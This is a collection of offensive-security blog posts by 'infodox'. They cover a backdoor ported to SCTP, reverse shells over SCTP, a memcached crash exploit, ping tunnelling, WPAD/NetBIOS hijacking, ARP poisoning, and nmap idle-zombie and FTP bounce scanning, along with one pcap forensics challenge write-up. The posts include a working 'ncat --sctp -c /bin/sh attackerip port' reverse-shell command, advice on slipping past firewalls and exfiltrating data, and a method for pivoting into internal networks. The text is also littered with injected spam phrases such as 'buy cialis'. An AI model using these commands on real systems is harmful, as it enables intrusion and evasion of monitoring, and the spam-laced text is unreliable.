TinySHell – Ported to SCTP

You may have seen, a while ago, my post on SCTP reverse shells.

I realized quite quickly that I should definately do some more research in this direction, and hence ported one of my favourite Unix backdoors (which uses a TCP connection) to use a SCTP connection instead. This backdoor allows for a remote PTY, file upload, and file download. It also is encrypted connection.

The backdoor in question is ‘TinySHell’ by the inestimable Christophe Devine (who left quite a legacy of code, which I may start to maintain as he appears to have vanished. Chris, if you are out there, get in touch or something! Love your work!). I spent a short while examining the code, then quickly patched it up to replace all the TCP stuff with SCTP stuff. I imagine I could easily alter it to do UDP, and might try that later.

Anyways, without further ado, here is the code. Again, all credit to Chris, all I did was modify it!

https://github.com/infodox/tsh-sctp

Aaaand a video of it in-use (rough cut, no editing, some freezing. Will clean up later)


Also, we have not died here. Some, er, circumstances lead to extended hiatus in publication of research material.

Happy pwning!

SCTP Reverse Shell

So, buy over the last while I was looking at “Interesting” ways to throw back a reverse shell and remain under the radar a little bit. UDP, TCP and ICMP reverse shells have been done to death (heck, you can even use DNS tunneling), so I had the daft idea to try SCTP.

I noticed while testing it, many rubbish “Security in a box” firewalls do not actually parse SCTP packets at all, and just let them zip right through the firewall without checking their contents. So it looked like a perfect candidate for data exfiltration, spawning reverse shells, and other such mischief :)

Anyway, at first I tested the idea out using ncat (from nmap), which features SCTP support and basically is a full replacement for netcat.

NOTE: SCTP support should be enabled by default on Linux. If it aint, do “modprobe sctp” and see does it work then. I found that OpenVZ virtual machines tend to not have SCTP support, depending on if it is supported on the host or not.

With ncat, doing the following is enough to deliver a reverse shell over SCTP.

rootedbox:~# ncat –sctp -c /bin/sh attackerip port

attacker:~# ncat –sctp -l -v -p port

Screenshot of this:

sctp reverse shell with netcat

sctp reverse shell with netcat

So, we can do it with ncat, however I wanted to see how hard it would be to implement this in python.

Luckily, there is a python module for making SCTP connections – pysctp. It behaves very similarly to the socket module.

After a bit of playing around, I managed to implement a reverse shell over SCTP in python, which you can find here: http://packetstorm.igor.onlinedirect.bg/UNIX/penetration/rootkits/sctp_reverse.py.txt

Screenshot:

python sctp reverse shell

SCTP Reverse shell in python

Further development includes implementing SSL – it works, just tends to randomly die because pythons SSL library is rubbish, and writing these payloads in a native language (C) as opposed to python. Lots more to do here!

 

Memcached Remote Denial of Service PoC

A long time ago, in 2011, a rather serious vulnerability was reported in Memcached. It is now 2013, and the vulnerability still exists in the latest version on the memcached Google Code page.

The report is here: https://code.google.com/p/memcached/issues/detail?id=192

Now, as you can see, by sending a specially crafted packet, we can cause Memcached to segfault, and essentially die. Memcached is used by a lot of high profile sites to speed up page load times, and killing it would impact a bit on site performance, so I was rather curious as to why this bug had not yet been killed.

As you can see from the report, the vulnerability is trivial to exploit. Just send the magic packet of death and it kills the memcached service. I tried to get remote code execution from it, but had no luck at all. Perhaps one of you might have more luck!

memcached dead

memcached ded

Exploit code available to download here: killthebox.py

As always, responsible use is encouraged. Killing $(big website) memcached might get you in trouble, so don’t do it.

As for the memcached devs: You have known about this for two bloody years and never fixed it. This is terribly irresponsible of you. Fix it.

Ptunnel Setup and Usage (Server Side)

This article will show you  how to setup and use the ptunnel Ping tunnelling application.
This is just the server side setup, cure I will write the client side later.

More info about ptunnel here: http://www.cs.uit.no/~daniels/PingTunnel/

First off, on the server (assuming a Debian/Ubuntu Linux server that you have root access to, I do not bother with other version)

apt-get update
apt-get install libpcap-dev
apt-get install make

Install Dependancies

next, sovaldi sale download the ptunnel source code onto the server.

wget http://www.cs.uit.no/~daniels/PingTunnel/PingTunnel-0.72.tar.gz

Unpack the tarball and cd into its directory

tar -xf PingTunnel-0.72.tar.gz
cd PingTunnel

Download and unpack ptunnel

Type “make” to build it

make

Finally, on the server, you will want to install “screen”

apt-get install screen

screen -S pingtunnel
./ptunnel

Pingtunnel running

NOTE: To add a password, use ./ptunnel -x password

Now hold down CTRL and press A then D to detatch from screen.

Detatch from screen

That is the Ping Tunnel Server set up and running :D

When I have time, I will write the article about client side usage. Busy atm.

nbsniff – Abusing the Netbios Name Lookup Service

This is a very short post, basically pointing you at someone elses site for something awesome, however, seeing as it is kind of a hot topic, I may as well write SOMETHING about it.

Recently there was a massive stir about the “FLAME” malware (which I am working on an article about) using a MITM attack to propegate, by hijacking Microsoft Update(s).

Pretty cool, no?

Well, first off, lets look at how it went about it.
First off, it used the NetBIOS hijacking technique (wherin, any netbios name lookup was answered with “ME”) to give victims a bogus WPAD.dat file.

“lolwat”?
Ok. When your computer is looking up another computer, it first tries DNS to see can it resolve the domain to an IP. Hijacking someones DNS is trivial, but requires a full on ARP poisoning, or rerouting, attack, which is pretty involved. So. If the domain DOESN’T resolve, the computer broadcasts a “NetBIOS Name Lookup” to EVERYONE, and in theory, only a computer with a matching name will reply.

This is where we come in. We reply with “Yeah, thats us!” to their request, and they then “trust” that we are who they are looking for.

So. When their computer automatically checks is there a WPAD server (Web Proxy Auto Discovery – a server on the network that tells computers what proxy settings to use) – we tell them “yo, thats me”. And serve up a malicious WPAD.dat file. Which, could make them simply route all their traffic through a logging proxy on our box, but in this case, simply tells them that we are their Windows Update providers.

When they then request updates, we go “here” and give them their Windows Updates (actually malware).

A fairly trivial attack really… Though Ron over at SkullSecurity can provide you with software to do this kind of thing, and likely explains it better :)

So without further ado, here be links to some software and stuff for you to play with :)
http://www.skullsecurity.org/wiki/index.php/Nbtool
http://www.skullsecurity.org/wiki/index.php/Nbsniff
SkullSecurity – Pwning Hotel Guests

Forensics – HackEire .pcap challenge

I was awfully saddened to hear there was going to be no HackEire challenge in 2012, as I had always hoped I would get a chance to attend. However, seems the IRISS-CERT guys might be doing something, so that should be fun :D

Over at boards.ie in the Tech/Security section, the challenges are slowly appearing. So when I saw the “pcap challenge”, I HAD to have a look. Seeing as I am taking Forensic Science and Analysis starting in September, a major change from what I was studying – Biopharmaceutical Chemistry. Well, I hope to be taking it – I applied, and theoretically should get the place as I have more than enough CAO points. Forensic Science both allows me to use my knowledge of chemistry, and other “hard sciences”, but also provides me with opportunities to further study Digital Forensics and such, which has, er, become of GREAT interest to me as I wish to try help prevent online crime, rather than facilitate. ANYWAYS. Enough of that, lets get down to the fun stuff!

***infodox puts on his network forensics hat***

You may get the challenge files here – Dropbox and the thread is here – Boards.ie

Now, this post is going to be edited a lot as I progress through, and seeing as it is .pcap files I am analysing, I will be starting off by playing with Wireshark and Xplico, though any other tools I use will also be documented.

The pcap_questions.rtf file has “Questions” about each pcap that you must answer, and I will be keeping strictly to their requirements rather than digressing. However if I see anything funny or interesting I will note it.

So, I am going to start with c1.pcap and start with the first question…

“What was the complete URI of the original web request that led to the client being compromised?”

Well, lets see. The easiest way to filter this would be to use urlsnarf, part of Dug Songs dsniff toolkit. This comes as standard with most penetration testing distributions…

After a bit of parsing (using /dev/brain and gedit), I removed all references to legit sites (yes, even all the advertising ones) and found the following suspect URL’s.

10.20.0.165 – – [04/Jun/2012:04:42:04 +0100] “GET http://10.20.0.111:8080/banking.htm HTTP/1.1″ – – “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”

10.20.0.165 – – [04/Jun/2012:04:42:04 +0100] “GET http://10.20.0.111:8080/banking.htm?UOjiXfyAbAISuH HTTP/1.1″ – – “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”

10.20.0.165 – – [04/Jun/2012:04:42:04 +0100] “GET http://10.20.0.111:8080/banking.htmTysdAWdqQEBybyCGKQkGJyVuQsNWvmIFg.gif HTTP/1.1″ – – “http://10.20.0.111:8080/banking.htm?UOjiXfyAbAISuH” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”

Now I had an IP address, so I opened the .pcap in Wireshark and proceeded to check what the hell was going to and from the “malicious” server.

I used the following filters:

ip.src == 10.20.0.111
and
ip.dst == 10.20.0.111

I then started peeking through the packet data to see could I find anything interesting…

The initial page (banking.htm) on the malicious server seems to serve a redirect to a second page, which serves up Javascript, and finally a .gif file, leading to remote code execution – once the GIF is served up, we see more traffic from the client to the server on port 4444 – pretty standard behavior for a Meterpreter reverse shell. So far, evidence suggests the “evil” machine was running some exploit from Metasploit.

1(a)
What was the complete URI of the original web request that led to the client being compromised?

> http://10.20.0.111:8080/banking.htm

1(b)
What file type was requested in the final web request to the malicious server? (Answer a, b, c ,d or e)

a. windows executable
b. javascript
c. pdf
d. worddocument
e. gif

> e, a .GIF file

1(c)
What is the sha1 hash of the afore-mentioned file?

> NOT FOUND YET, HAVE TO EXTRACT… Will look into extracting the file later :)

1(d)
What is the number of the first frame that indicates that the client has been compromised?

> 4722 in Wireshark seems to be the SYN packet in the reverse shell

1(e)
At one point, the malicious server sends a malicious file to the client. What type of file is ? (Answer a, b, c ,d or e)

a. windows executable
b. javascript
c. pdf
d. worddocument
e. gif

> NOT FOUND YET, HAVE TO EXTRACT!

1(f)
What is the sha1 hash of the malicious file?

> NOT FOUND YET, HAVE TO EXTRACT…

1(g)
What vulnerable software is exploited (in the following format, ff3.5, ff3.6, ff5, Word2010, ie7, Safari2, Chrome2, AdobeReader, ie6, ff4)?

> FF4 According to User Agent (Mozilla/4.0)

1(h)
When the capture ends, is the client still connected to the malicious attacker? Answer either “yes” or “no”.

> YES, the connection to port 4444 never has a FIN or RST so I can assume it is still ongoing.

1(i)
Can you give the corresponding CVE security bulletin that covers the vulnerability here that was exploited (answer in form of CVE-$year-$number).

> NOT FOUND (YET)

1(j)
From the capture, it is clear that the attacker gets a certain form of access (i.e. the interface), what (type of) access does the attacker “get” on the client?

> Shell access, based on the junk data, an encrypted reverse shell. Based on port data, Meterpreter. Further investigation into the payload used is necessary.

— Post Changelog —
1. The editor broke and pasted the first three paragraphs into the top like a million times. oops…

 

Video: ARP Toxin and Driftnet Man in the Middle

So, sovaldi sale in this quick video (made ages ago for the talk I gave at CampusCon), buy cialis I demonstrate the use of an ARP Poisoning attack to redirect someone elses traffic through my computer, then I sniff thier traffic. In a later blog post I will write more about MiTM and ARP Poisoning, but for now, check out this video. It uses Nemesis, which we covered in my last post, to function…

[Howto] Installing Nemesis on Ubuntu Linux

Ok. Nemesis is a very powerful Packet Crafting/Injection tool for Unix based systems. I have heard that ALLEGEDLY it can be installed/ran on Windows also, ailment but never felt like trying, as I do not use Windows nor is Windows much good for ANYTHING to do with sockets.

Nemesis is similar to tools like “hping” in that you can customize the packet you want to send, and send it. Very useful for playing with low level protocols, and incredible if you want to learn more about the network layer stuff.

For more information on Nemesis, prostate you can always check out the following links…

http://nemesis.sourceforge.net/

http://www.darknet.org.uk/2007/05/nemesis-packet-injection-suite/

http://packetlife.net/armory/nemesis/

SO. How do I get Nemesis to work on Ubuntu and such?

Well, most distributions do not have it in their repositories it seems, and just because it is easy to do, let’s compile it from source.

Step One: Install Dependancies

First off we need to install the dependancies it has, so the following two commands should do the trick.

apt-get install libdnet-dev
apt-get install libpcap-dev

No screenshot should be needed here I hope…

Step Two: Install “libnet” to the /usr directory.

Now for convenience, I do my installation in the /usr directory. Don’t ask why, it just seemed right at the time.

The following commands should do this easily for you…

The first three are “preparing the build area”

cd /usr
mkdir nembuild
cd nembuild

The next three are “getting the sources and unpacking them”
wget http://ips-builder.googlecode.com/files/libnet-1.0.2a.tar.gz
tar -xf libnet-1.0.2a.tar.gz
cd Libnet-1.0.2a

The next commands “configure” and make + make install the Libnet libraries.
./configure
make && make install

Installing Libnet

So. Now that we have successfully installed Libnet (if you get some wierd errors, leave a comment and I can try help you) we can go on and install Nemesis!

Step Three: Installing Nemesis

So. This is the fun part – where we get to finally install Nemesis.

Assuming you are still in the directory “/usr/nembuild/Libnet-1.0.2a”, just “cd ..”.

Otherwise, “cd /usr/nembuild” so we are all on the same page!

So. Lets prepare our “Environment” for the Nemesis installation by getting and unpacking the sources! The following commands should do it…

wget http://heanet.dl.sourceforge.net/project/nemesis/nemesis/1.4/nemesis-1.4.tar.gz
tar -xf nemesis-1.4.tar.gz
cd nemesis-1.4
Preparing to install Nemesis

So, thats everything prepared. Now for the tricky bit – making it build properly.

Note that I used very specific paths for this – this is because we HAVE to specify THESE libnet libraries!

Now for the next commands…

./configure —with-libnet-includes=/usr/nembuild/Libnet-1.0.2a/include —with-libnet-libraries=/usr/nembuild/Libnet-1.0.2a/lib
make && make install

Done!

Installing Nemesis

There we go! Now for usage and such, “man nemesis” is a good place to start – they don’t make those man pages for nothing you know!

Finally, to wrap up, a screenshot of Nemesis!

Nemesis - Screenshot

Nmap – Locating Idle Scan Zombies and FTP Bounce Servers

So, ambulance having read my previous posts on Idle Scanning and FTP Bounce, you may be interested in finding useable boxes.

Now, as I suggested, you could scan for printers or other embedded devices, they make fucking AMAZING Idle Scan hosts. However, there is an nmap script here which is excellent for checking a host to see is it useable, by checking how its IPID sequence works.

Meet ipidseq.nse

ipidseq.nse is basically a test script, that tells you if you can use a host for Idle Scans. So, assuming you want a fair few zombies, lets scan 1000 hosts in the hope of finding a few good ones!

root@bha:~# nmap -iR 1000 —script ipidseq -T5 -v -oA zombies

The above scan will scan 1000 random IP addresses using the ipidseq script, testing them to see are they useable as zombies. I am using T5 here as scanning ranges slowly is BORING :P

The -oA zombies will create three “Output Files”. zombies.xml (XML format of scan), zombies.nmap (normal output), and a third “grepable” version – zombies.gnmap. You can then extract the useable hosts from said list using grep or similar, or just scroll through, copy, paste, like myself…

“So we found us some Zombies. What about those Bouncy FTP servers then?”

Well, nmap again has the solution to this problem. The ftp-bounce.nse script. We will use it in a very similar manner to the ipidseq script…

root@bha:~# nmap -iR 1000 —script ftp-bounce -T5 -v -oA bouncyFTP

This does the same as above, except instead it outputs lists of FTP servers we can “Bounce” via! Useful, no?

BONUS ROUND! Finding Anonymous FTP Servers for stashin’ yo’ warez!

So. Say you want to store/share a bunch of files and need some storage, or just like rummaging through open FTP servers (likely in search of other peoples warez and such… Never know, might find someones super secret 0day stash!).

How do we go about doing such a thing? Well, Guess what? nmap, yet again, solves this problem with the ftp-anon script.

Now, as above, you simply use it like so…

root@bha:~# nmap —script ftp-anon -T5 -iR 1000 -v -oA ftpAnon

Remember – with these you can always scan actual *ranges* instead of my “scan 1000 random hosts” idea, and this is VERY useful for auditing internal networks! Or some specific target networks… I know some web hosting firms may be VERY interested in scanning their own ranges for anonymous FTP setups to detect illegal piracy and such!

Remember, ask before you scan!

Nmap – FTP Bounce Scans

In part One and Two of this series I described various methods of evading IDS/IPS/Firewalls, sick and general methods of evading detection when port scanning your targets using nmap.
In this instalment I hope to give an overview of the technique called the “FTP Bounce” Scan technique, and various “interesting” uses I have had for it…
This, along with my other nmap articles, is all kind of my notes for the wiki article over at http://blackhatacademy.org – reopening soon – with lots of shiny new content and awesome stuff!

So, how does FTP Bounce work?
Well, the File Transfer Protocol, according to its RFC (RFC 959 according to nmap man pages), has a feature called the PORT command (now I may be messing up, but I THINK this is the command. Ping me if I am wrong :3 ). Basically it allows proxy FTP connections, where I can ask the FTP server I am connected to to send a file to a host/port I specify. Obviously, in order to send a file to another host/port, it has to CONNECT to said host/port. So, we can use this to get the FTP server to check is said host/port open… Seeing what I am getting at here?

We can make an arbritary FTP server port scan another server for us (IF said FTP server supports this “feature”… Which, according to nmaps man pages, many do not anymore… but still!).

Now, most of us are likely thinking “Right, so I an make random FTP servers act as “drones” during my port scans… AWESOME!”. Yes, yes you can. This puts another “hop” between you and your victim, meaning it is a shitload harder to trace it back to you! Using standard methods like -T0 and such are recommended here, to make things even sneaker. As the FTP server is not DESIGNED to be a port scanner, it is not exactly going to be stealthy… So we kind of have to rely on timing. Need I say this is TCP ports only also?

Now for the super fun part. Now the following idea, I thought was fairly original when I came up with it while walking my dog. However, upon reading the man pages for nmap (and you wondered why I was sleep deprived? I STILL AM!) I realized Fyodor had gotten there first. Years ago. Feck.
However, it is still a cool trick… So I will outline it.

Say you are scanning company.tld, and have found a FTP server on their network, but the rest of the bloody network is firewalled off. You wish to scan the inside of their network. So, you somehow have gained credentials to their FTP server (or it supports anonymous logins), and you are still wondering how to use this to scan out the insides.
FTP BOUNCE!
Use the external FTP server as your bounce host, and ask it to scan various inside-network ranges (just use the default 10.x, 192.168.x, etc) for you until you figure out which addressing scheme they use. Then ask it to scan the whole bloody network for you! Now, you have mapped out their internal networks by simply leveraging the FTP Bounce bug in their FTP server! Awesome, no?

Using FTP Bounce (Assuming you have a vulnerable FTP that allows this, see the ftp-bounce NSE script for checking FTP servers…)

root@bha:~# nmap -T0 -b username:password@ftpserver.tld:21 victim.tld

This uses the username “username”, the password “password”, the FTP server “ftpserver.tld” and port 21 on said server to scan victim.tld.
If the FTP server supports anonymous logins, just forget about the username:password@ part and nmap will assume it allows-anonymous. You may omit :21 if the FTP port is 21, however, some people configure FTP on wierd ports as an attempt at “security”.

So, thought up of any “fun” uses for the FTP bounce scan technique? Tell us about them! And keep an eye out for the finished Wiki article over at http://blackhatacademy.org (if I ever finish it, that is :P )

// Yay! Still importing content with great success!